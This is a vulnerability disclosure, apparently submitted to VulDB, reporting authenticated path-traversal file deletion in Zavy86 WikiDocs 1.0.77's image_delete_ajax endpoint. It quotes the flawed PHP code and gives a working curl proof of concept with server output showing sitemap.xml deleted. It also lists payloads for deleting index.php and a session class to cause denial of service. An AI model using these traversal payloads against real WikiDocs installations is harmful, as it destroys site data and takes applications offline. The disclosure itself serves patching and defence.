| 제목 | Zavy86 WikiDocs 1.0.77 Administrator Arbitrary File Deletion via Path Traversal |
|---|
| 설명 | The image_delete_ajax() endpoint in submit.php improperly concatenates user‐supplied filenames to its document directory without sanitization or canonicalization, allowing an authenticated administrator to delete any file on disk that the web server user can write, via a simple path‐traversal payload.
Affected Component
File: submit.php?act=image_delete_ajax
Function: image_delete_ajax()
Authentication: Requires session authentication level 2 (administrator)
Technical Details
$document = $_POST['document'];
$image_filename = $_POST['image_name'];
...
$DOC = new Document($document);
if(!is_dir($DOC->DIR)){ mkdir($DOC->DIR,0755,true); }
$filename = $DOC->DIR . $image_filename;
if (file_exists($filename)) {
$image_deleted = unlink($filename);
}
An admin can supply image_name=../../sensitive.php (or any file) and have it deleted.
Proof of Concept (PoC):
┌──(root㉿kali)-[/home/kali]
└─# curl http://127.0.0.1/sitemap.xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url>
<loc>http://127.0.0.1/</loc>
<lastmod>1970-01-01T00:00:00+00:00</lastmod>
</url>
<url>
<loc>http://127.0.0.1/opt</loc>
<lastmod>1970-01-01T00:00:00+00:00</lastmod>
</url>
</urlset>
┌──(root㉿kali)-[/home/kali]
└─# curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1' -H $'Content-Length: 38' -H $'Cache-Control: max-age=0' -H $'sec-ch-ua: \"Chromium\";v=\"133\", \"Not(A:Brand\";v=\"99\"' -H $'sec-ch-ua-mobile: ?0' -H $'sec-ch-ua-platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Origin: http://127.0.0.1' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H $'Referer: http://127.0.0.1/apidocs/com/sap/engine/deploy/manager/scripts/initializations.js?auth' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: keep-alive' \
-b $'PHPSESSID=e3oi7be7l9pig7s3no19brasmp' \
--data-binary $'document=&image_name=../../sitemap.xml' \
$'http://127.0.0.1/submit.php?act=image_delete_ajax'
HTTP/1.1 200 OK
Date: Fri, 04 Jul 2025 08:15:44 GMT
Server: Apache/2.4.62 (Unix)
X-Powered-By: PHP/8.3.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"error":null,"code":"image_deleted","file":"\/var\/www\/localhost\/htdocs\/datasets\/documents\/\/..\/..\/sitemap.xml"}
┌──(root㉿kali)-[/home/kali]
└─# curl http://127.0.0.1/sitemap.xml
<!DOCTYPE html>
<html lang="en">
<head>
... 404 page ...
Delete application code (DoS):
document=&image_name=../../index.php
document=&image_name=../../classes/Session.class.php
CVSS v3.1 Assessment
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): High (administrator session)
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): Low/High (arbitrary file deletion)
Availability (A): High (application DoS)
If "Integrity Low" is assumed (i.e. only non‐critical files), the score would be 5.5; however the ability to delete may source files could justify I:H.
Application Setup:
docker run -d -p 80:80 zavy86/wikidocs
References:
https://drive.google.com/drive/u/0/folders/100yv5_KxOHHqTvmMeXSquBuxafwj6sfh
Credits
Discovered by Matan Sandori
|
|---|
| 사용자 | MatanS (UID 86894) |
|---|
| 제출 | 2025. 07. 04. AM 10:38 (12 개월 ago) |
|---|
| 모더레이션 | 2025. 07. 13. AM 09:28 (9 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 316273 [Zavy86 WikiDocs 까지 1.0.77 submit.php image_drop_upload_ajax/image_delete_ajax 디렉토리 순회] |
|---|
| 포인트들 | 17 |
|---|